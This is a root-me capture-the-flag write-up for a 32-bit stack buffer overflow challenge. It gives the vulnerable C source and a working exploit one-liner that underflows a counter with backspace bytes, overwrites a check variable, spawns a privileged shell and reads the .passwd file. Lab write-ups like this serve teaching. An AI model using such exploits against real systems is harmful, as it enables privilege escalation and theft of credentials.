ELF x86: Stack buffer overflow basic 3¶

root-me challenge: An intermediate level to familiarize yourself with stack overflows.

Environment configuration:

PIE 	Position Independent Executable 	 No 
RelRO 	Read Only relocations 	                 Yes 
NX 	Non-Executable Stack 	                 Yes 
ASLR 	Address Space Layout Randomisation 	 No 
SF 	Source Fortification 	                 No 
SSP 	Stack-Smashing Protection 	         No 
SRC 	Source code access 	                 Yes  

Source code:

#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
 
void shell(void);
 
int main()
{
 
  char buffer[64];
  int check;
  int i = 0;
  int count = 0;
 
  printf("Enter your name: ");
  fflush(stdout);
  while(1)
    {
      if(count >= 64)
        printf("Oh no...Sorry !\n");
      if(check == 0xbffffabc)
        shell();
      else
        {
            read(fileno(stdin),&i,1);
            switch(i)
            {
                case '\n':
                  printf("\a");
                  break;
                case 0x08:
                  count--;
                  printf("\b");
                  break;
                case 0x04:
                  printf("\t");
                  count++;
                  break;
                case 0x90:
                  printf("\a");
                  count++;
                  break;
                default:
                  buffer[count] = i;
                  count++;
                  break;
            }
        }
    }
}
 
void shell(void)
{
  setreuid(geteuid(), geteuid());
  system("/bin/bash");
}

4*\x08 is going to decrease the value of count by 4 to get the check variable, which needs to be 0xbffffabc (mind endian):

app-systeme-ch16@challenge02:~$ cat <(python -c "print '\x08'*4 + '\xbc\xfa\xff\xbf'") - | ./ch16
cat .passwd

Resources¶

Counter moves¶

Here the overflow redirects into chosen code. ASLR makes the target address hard to predict. Defenders’ notes on this are under memory corruption and its limits.